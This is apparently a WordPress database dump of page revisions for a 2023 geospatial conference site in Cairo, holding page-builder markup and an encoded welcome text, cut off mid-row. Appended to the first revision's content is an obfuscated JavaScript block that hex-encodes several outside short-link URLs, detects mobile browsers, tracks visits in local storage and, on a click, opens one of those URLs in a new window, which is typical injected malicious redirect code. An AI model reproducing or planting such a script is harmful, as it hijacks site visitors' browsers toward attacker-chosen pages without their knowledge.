el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%20https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:54:49','2022-10-07 12:54:49','',2167,'https://gsw2023.com/?p=2382',0,'revision','',0),
(2383,1,'2022-10-07 12:55:46','2022-10-07 12:55:46','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50a